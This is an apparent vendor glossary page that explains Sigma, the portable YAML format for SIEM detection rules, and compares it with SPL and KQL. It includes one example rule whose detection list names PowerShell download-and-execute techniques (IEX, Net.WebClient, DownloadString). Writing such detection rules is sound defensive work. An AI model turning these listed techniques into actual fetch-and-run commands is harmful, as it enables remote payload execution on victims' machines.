// resources / glossary / sigma-rules

What are Sigma Rules?

Sigma is a generic and open signature format for SIEM systems. Like YARA for files and Snort for network traffic, Sigma provides a standardized YAML format for log-based detection rules that can be converted to any SIEM query language.

// overview

A Universal Language for Detection Rules

Sigma was created by the SigmaHQ community to solve a fundamental problem in security operations: detection rules are locked to specific SIEM platforms. A Splunk SPL query cannot run in Microsoft Sentinel, and a KQL query cannot run in Elastic. This forces security teams to rewrite the same detection logic for every platform they operate.

Sigma provides a vendor-agnostic YAML format that describes what to detect — the log source, the conditions, and the severity — without specifying how any particular SIEM should execute the query. Converter tools (backends) then translate Sigma rules into native query languages like SPL, KQL, ES|QL, Lucene, Chronicle YARA-L, and dozens of others.

The result is a write-once, deploy-anywhere detection ecosystem. A single Sigma rule can protect organizations running Splunk, Sentinel, Elastic, QRadar, Chronicle, Palo Alto XSIAM, and Sumo Logic simultaneously.

// yaml structure

Anatomy of a Sigma Rule

Every Sigma rule is a YAML file with a well-defined structure. The key fields describe metadata, the log source to query, the detection logic, and the severity classification.

title: Suspicious PowerShell Download Cradle# human-readable rule name id: 3b6ab547-1503-4a73-a956-4f4a5c4f5b21# unique UUID status: stable# experimental | test | stable description: | Detects PowerShell commands commonly used to download and execute payloads from remote servers, including IEX, Invoke-WebRequest, and Net.WebClient patterns. author: Threadlinqs Intelligence date: 2026-03-15 references: - https://attack.mitre.org/techniques/T1059/001/ tags: - attack.execution# MITRE tactic - attack.t1059.001# MITRE technique - attack.command_and_control - attack.t1105 logsource:# what logs to query category: process_creation product: windows detection:# the matching logic selection_img: Image|endswith: - '\powershell.exe' - '\pwsh.exe' selection_cmd: CommandLine|contains: - 'IEX' - 'Invoke-Expression' - 'Invoke-WebRequest' - 'Net.WebClient' - 'DownloadString' - 'DownloadFile' condition: selection_img and selection_cmd# boolean logic falsepositives: - Legitimate admin scripts using download cradles - Software deployment tools level: high# informational | low | medium | high | critical
// why sigma matters

Write Once, Convert Everywhere

The Sigma conversion pipeline is what makes the format transformative. A single rule written in Sigma YAML can be automatically converted into native queries for every major SIEM platform.

Sigma YAML
-->
pySigma / sigma-cli
-->
SPL / KQL / ES|QL / Lucene / YARA-L / ...

Platform Independence

Security teams migrating from Splunk to Sentinel (or running both) can carry their detection logic with them. No manual rewriting required.

Community-Driven

The SigmaHQ repository on GitHub contains over 3,000 community-contributed rules covering common and advanced adversary behaviors, maintained by hundreds of contributors.

ATT&CK Integration

Sigma rules use ATT&CK tags natively. Every rule can be mapped to tactics and technique IDs, enabling coverage analysis against the MITRE framework.

Detection-as-Code

YAML is version-controllable. Teams store Sigma rules in Git, review changes via pull requests, and deploy updates through CI/CD pipelines.

// comparison

Sigma vs SPL vs KQL

Each format has distinct strengths. Sigma prioritizes portability, while SPL and KQL prioritize depth within their respective ecosystems.

Attribute Sigma SPL KQL
Format YAML Proprietary query language Proprietary query language
Portability Any SIEM via backends Splunk only Microsoft Sentinel / Defender
Ecosystem 3,000+ SigmaHQ rules, pySigma, sigma-cli Splunkbase apps, Splunk ES content Microsoft Sentinel content hub
Complexity Declarative, low barrier to entry Full programming constructs, macros, lookups Functional syntax, joins, materialized views
Performance Tuning Handled by backend converter Direct index/sourcetype control Direct table/timerange optimization
Version Control Native (YAML in Git) Requires export/import workflow Requires export/import workflow
// sigmahq

The SigmaHQ Repository

The SigmaHQ/sigma repository on GitHub is the canonical source for community-maintained Sigma rules. As of 2026, it contains over 3,000 detection rules organized by log source category.

Rules go through a review process before being merged. Each rule must include a valid logsource definition, at least one false-positive consideration, appropriate ATT&CK tags, and a severity level. The repository also maintains the Sigma specification itself, backend converter tools, and processing pipelines for field mapping and log source translation.

The conversion toolchain has evolved from the original sigmac converter to the modern pySigma ecosystem. pySigma uses a modular architecture with separate packages for backends (output formats), pipelines (field mappings), and validators (rule quality checks).

// threadlinqs + sigma

How Threadlinqs Uses Sigma

Every threat on the Threadlinqs platform includes detection rules in three formats: SPL, KQL, and Sigma. Sigma rules are auto-generated alongside platform-specific queries so that teams running any SIEM have ready-to-deploy detections.

1,248
Sigma Rules

Production-ready Sigma rules in the detection library, each mapped to a specific threat and ATT&CK technique.

3 Formats
Per Detection

Every detection ships as SPL + KQL + Sigma. Copy the format your SIEM needs directly from the threat detail panel.

344
Threats Covered

Sigma rules span the full threat feed, from APT campaigns and supply-chain attacks to ransomware and zero-days.

// related

Related Topics

Detection Engineering SPL MITRE ATT&CK Threat Intelligence
// faq

Frequently Asked Questions

How do I convert Sigma rules to Splunk SPL?

Use the pySigma library with the Splunk backend. Install it via pip: pip install pysigma pysigma-backend-splunk pysigma-pipeline-sysmon. Then run sigma convert -t splunk -p sysmon rule.yml to produce a ready-to-use SPL query. The SigmaHQ project also provides sigma-cli for batch conversion. Threadlinqs ships pre-converted SPL alongside every Sigma rule, so no manual conversion is needed.

What's the difference between Sigma and YARA?

Sigma and YARA serve different detection domains. YARA rules match patterns in files and memory — they are used for malware analysis, scanning binaries, and identifying malicious payloads on disk. Sigma rules match patterns in log events — they are used for SIEM-based detection of adversary behavior in telemetry data like process creation, network connections, and authentication events. Think of YARA as detection for files and Sigma as detection for logs.

How do I contribute to SigmaHQ?

Fork the SigmaHQ/sigma repository on GitHub, create a new rule following the Sigma specification and naming conventions, validate it with sigma check, and submit a pull request. Rules should include a descriptive title, accurate logsource definition, at least one false-positive consideration, appropriate level and status fields, and relevant ATT&CK tags. The SigmaHQ maintainers review submissions for quality and accuracy before merging.

1,248 Sigma rules across 344 threats — ready to convert or deploy directly.

[ browse_sigma_rules ]